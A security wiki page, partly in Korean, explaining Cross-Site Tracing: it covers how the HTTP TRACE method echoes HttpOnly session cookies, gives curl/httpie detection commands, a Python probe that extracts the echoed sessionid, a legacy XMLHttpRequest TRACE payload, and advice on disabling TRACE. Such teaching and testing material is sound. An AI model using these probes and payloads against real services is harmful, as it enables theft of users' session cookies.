
XST (Cross-Site Tracing)

๐Ÿ” Introduction

XST (Cross-Site Tracing) is an attack that abuses the HTTP TRACE method. Because TRACE echoes the request it received, including its Cookie header, back to the client, it can be used to read session cookies that the HttpOnly attribute would otherwise hide from script.

TRACE Method

TRACE is one of the HTTP methods intended for diagnostics: the server sends the request it received back to the client, unchanged, as the body of the response (with Content-Type: message/http). It behaves much like an echo service.

TRACE / HTTP/1.1
TestHeader: 1234
Cookie: abcd=1234;

HTTP/1.1 200 OK
Connection: Keep-Alive
...

TRACE / HTTP/1.1
TestHeader: 1234
Cookie: abcd=1234;

HttpOnly

Cookie ์†์„ฑ ์ค‘ HttpOnly๊ฐ€ ์ ์šฉ๋œ ์ฟ ํ‚ค๋Š” Javascript์—์„œ ์ ‘๊ทผํ•˜์ง€ ๋ชปํ•˜๋„๋ก ์ œํ•œํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. ์ผ๋ฐ˜์ ์œผ๋กœ ์„ธ์…˜ ์ฟ ํ‚ค์™€ ๊ฐ™์ด ์ค‘์š”ํ•œ ์ฟ ํ‚ค๋Š” HttpOnly ์†์„ฑ์„ ์ฃผ์–ด XSS ๋“ฑ์˜ ๊ณต๊ฒฉ์„ ํ†ตํ•ด Javascript๋ฅผ ์ด์šฉํ•˜์—ฌ ์ฟ ํ‚ค์— ์ ‘๊ทผํ•˜๋Š” ๊ฒƒ์„ ์ฐจ๋‹จํ•˜๊ธฐ ๋–„๋ฌธ์— ์„ธ์…˜ ์ฟ ํ‚ค๋ฅผ ๋ณดํ˜ธํ•˜๋Š”๋ฐ ์ข‹์€ ๋ฐฉ๋ฒ• ์ค‘ ํ•˜๋‚˜์ž…๋‹ˆ๋‹ค.

Set-Cookie: session=1231421512515; httponly;

session์ด๋ž€ ์ฟ ํ‚ค๊ฐ€ ๋งŒ์•ฝ httponly ์†์„ฑ์ด๋ผ๋ฉด javascript์—์„œ ์ ‘๊ทผ ์‹œ ํ•ด๋‹น ์ฟ ํ‚ค๊ฐ€ ๋…ธ์ถœ๋˜์ง€ ์•Š์Šต๋‹ˆ๋‹ค.

consoel.log(document.cookie)

์ผ๋ฐ˜์ ์ธ ๊ฒฝ์šฐ๋ผ๋ฉด cookie๋ฅผ ํƒˆ์ทจํ•  ์ˆ˜ ์—†์ง€๋งŒ, ์„œ๋น„์Šค์— TRACE Method๊ฐ€ ํ—ˆ์šฉ๋œ ๊ฒฝ์šฐ TRACE Method๋กœ ์›น ์š”์ฒญ์„ ๋ฐœ์ƒ์‹œํ‚ค๋ฉด, HTTP Request์—๋Š” Cookie๊ฐ€ ์ „๋‹ฌ๋˜๊ธฐ ๋•Œ๋ฌธ์— sessionid ์ฟ ํ‚ค๊ฐ€ ์ „์†ก๋ฉ๋‹ˆ๋‹ค. ์ด ๋•Œ TRACE๋Š” Response์— Request ์ •๋ณด๋ฅผ ํฌํ•จํ•˜๊ธฐ ๋•Œ๋ฌธ์— Response์— sessionid ์ฟ ํ‚ค ์ •๋ณด๊ฐ€ ํฌํ•จ๋˜์–ด ์ „๋‹ฌ๋ฉ๋‹ˆ๋‹ค.

TRACE /testpage HTTP/1.1
TestHeader: 1234
Cookie: sessionid=1123142124234;

HTTP/1.1 200 OK
Connection: Keep-Alive
...

TRACE /testpage HTTP/1.1
TestHeader: 1234
Cookie: sessionid=1123142124234;

The attacker then only has to read the response and extract the sessionid value from the echoed Cookie header.

🗡 Offensive techniques

Detect

์„œ๋น„์Šค์—์„œ TRACE ๋ฉ”์†Œ๋“œ๋ฅผ ํ—ˆ์šฉํ•˜๋Š” ํŽ˜์ด์ง€๋ฅผ ํ™•์ธํ•˜๋ฉด ๋ฉ๋‹ˆ๋‹ค. ZAP/BurpSuite์—์„œ Method ๋ถ€๋ถ„์„ TRACE๋กœ ๋ณ€๊ฒฝํ•˜์—ฌ ์ „์†กํ•˜๊ฑฐ๋‚˜ curl, httpie ๋“ฑ์˜ cli ๋„๊ตฌ์—์„œ method๋ฅผ ์ง€์ •ํ•ด ์ „์†กํ•˜๋Š” ํ˜•ํƒœ๋กœ ์ฒดํฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

[ curl ]
$ curl -i -k -X TRACE https://target.service

[ httpie ]
$ http TRACE https://target.service
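As an added example (not code from the original article), the following Python probe automates the Detect step above and the response handling described earlier: it sends TRACE with a random marker header, flags the endpoint only when that marker comes back in the body, and parses the echoed Cookie header out of the message/http body the way an XST attacker would. To run offline it also stands up two tiny local servers constructed for the demo, one that echoes TRACE and one that refuses it with 405; the 127.0.0.1 target and the sessionid=deadbeef cookie value are assumptions, not from the page.

```python
"""Probe an HTTP endpoint for an enabled TRACE method and, if the request is
echoed back, pull the Cookie header out of the echo (XST response handling).

Added example for this page, not code from the original article. The two
local handlers below are constructed for an offline demonstration; the
'sessionid=deadbeef' cookie and the 127.0.0.1 target are assumed values.
"""
import http.client
import secrets
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer


class VulnerableTraceHandler(BaseHTTPRequestHandler):
    """Echoes TRACE requests back as message/http, as RFC 7231 describes."""

    def log_message(self, format, *args):  # keep demo/test output quiet
        pass

    def do_GET(self):
        body = b"hello\n"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_TRACE(self):
        # Request line plus every header, Cookie included, becomes the body.
        echo = (self.requestline + "\r\n" + str(self.headers)).encode()
        self.send_response(200)
        self.send_header("Content-Type", "message/http")
        self.send_header("Content-Length", str(len(echo)))
        self.end_headers()
        self.wfile.write(echo)


class HardenedHandler(VulnerableTraceHandler):
    """Same server with TRACE refused: the fix the page recommends."""

    def do_TRACE(self):
        self.send_response(405)
        self.send_header("Allow", "GET")
        self.send_header("Content-Length", "0")
        self.end_headers()


def start_server(handler):
    """Bind an ephemeral localhost port and serve in the background."""
    server = HTTPServer(("127.0.0.1", 0), handler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def extract_cookie(echoed_body, name):
    """Parse an echoed request and return the value of cookie `name`, or None."""
    for line in echoed_body.splitlines():
        header, sep, value = line.partition(":")
        if sep and header.strip().lower() == "cookie":
            for pair in value.split(";"):
                key, _, val = pair.strip().partition("=")
                if key == name:
                    return val
    return None


def probe_trace(host, port, path="/", cookie="sessionid=deadbeef"):
    """Send TRACE with a random marker header and decide whether it was echoed.

    A 200 alone is not proof (some servers answer 200 to any method), so the
    marker must come back in the body before the endpoint is flagged.
    """
    marker = secrets.token_hex(8)
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("TRACE", path, headers={"X-Probe": marker, "Cookie": cookie})
        resp = conn.getresponse()
        body = resp.read().decode("utf-8", errors="replace")
        ctype = resp.getheader("Content-Type", "")
    finally:
        conn.close()
    echoed = resp.status == 200 and marker in body
    return {
        "status": resp.status,
        "content_type": ctype,
        "echoed": echoed,
        "sessionid": extract_cookie(body, "sessionid") if echoed else None,
    }


if __name__ == "__main__":
    for label, handler in (("vulnerable", VulnerableTraceHandler),
                           ("hardened", HardenedHandler)):
        server, port = start_server(handler)
        print(label, probe_trace("127.0.0.1", port))
        server.shutdown()
```

Point probe_trace at a real host and port to test a service; the marker header is what distinguishes a genuine echo from a server that merely returns 200 for unknown methods.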

Exploitation

XMLHttpRequest

The classic payload issues TRACE from the victim's browser and reads the echoed Cookie header out of the response. Note that current browsers treat TRACE as a forbidden method in both XMLHttpRequest and fetch, so open("TRACE", ...) throws a SecurityError; the snippet is kept for reference and only works in legacy clients.

var xmlHTTP = new XMLHttpRequest();
xmlHTTP.open("TRACE", "https://target.service", false); // synchronous request
xmlHTTP.onreadystatechange = function () {
    if (xmlHTTP.readyState == 4 && xmlHTTP.status == 200) {
        alert(xmlHTTP.response); // echoed request, Cookie header included
    }
};
xmlHTTP.send();

🛡 Defensive techniques

Disable the TRACE method on every tier that terminates HTTP, i.e. the application server and any reverse proxy or load balancer in front of it. On Apache httpd this is the TraceEnable off directive; nginx does not implement TRACE and answers 405 Not Allowed by default. After the change, re-run the curl probe from the Detect section and confirm that the response is 405 or 501 and that the request headers are no longer echoed in the body. Even though current browsers refuse to send TRACE from script, the method still echoes cookies to any other client, so it should be switched off regardless.

🕹 Tools

📌 References

Licensed under CC BY-NC-SA 4.0
Last updated on Oct 24, 2021 18:30 +0900